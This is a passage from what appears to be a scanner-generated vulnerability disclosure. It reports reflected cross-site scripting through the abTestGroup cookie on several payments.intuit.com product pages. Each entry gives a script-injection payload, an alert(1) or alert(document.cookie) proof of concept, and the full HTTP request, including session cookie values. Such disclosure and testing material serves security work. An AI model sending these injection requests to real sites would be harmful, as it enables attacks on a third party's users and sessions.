s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16671c4"><script>alert(1)</script>a7dc609c67f;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ac6ae<script>alert(1)</script>299a08e1cc6 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ac6ae<script>alert(1)</script>299a08e1cc6;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0c27"><script>alert(1)</script>2c3cad478e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16b0c27"><script>alert(1)</script>2c3cad478e;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 3b445<script>alert(1)</script>1d1b4924dde was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T163b445<script>alert(1)</script>1d1b4924dde;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c3d"><script>alert(1)</script>97f3c4b0963 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1647c3d"><script>alert(1)</script>97f3c4b0963;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83731"><script>alert(1)</script>8d0a1b75f18 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1683731"><script>alert(1)</script>8d0a1b75f18;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d7ba9<script>alert(1)</script>df514fb9a00 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d7ba9<script>alert(1)</script>df514fb9a00;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe97"><script>alert(1)</script>b605d5bc92b was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bfe97"><script>alert(1)</script>b605d5bc92b;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e3cdf<script>alert(1)</script>457e3b04e25 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e3cdf<script>alert(1)</script>457e3b04e25;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 94dbf<script>alert(1)</script>468c7862810 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1694dbf<script>alert(1)</script>468c7862810;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32b2"><script>alert(1)</script>eca551a06e2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16a32b2"><script>alert(1)</script>eca551a06e2;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40f2"><script>alert(1)</script>2ecf5ecc899 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e40f2"><script>alert(1)</script>2ecf5ecc899;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ff5ed<script>alert(1)</script>1c8e4d0787a was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ff5ed<script>alert(1)</script>1c8e4d0787a;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 6fb36<script>alert(1)</script>4c918b363ab was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; 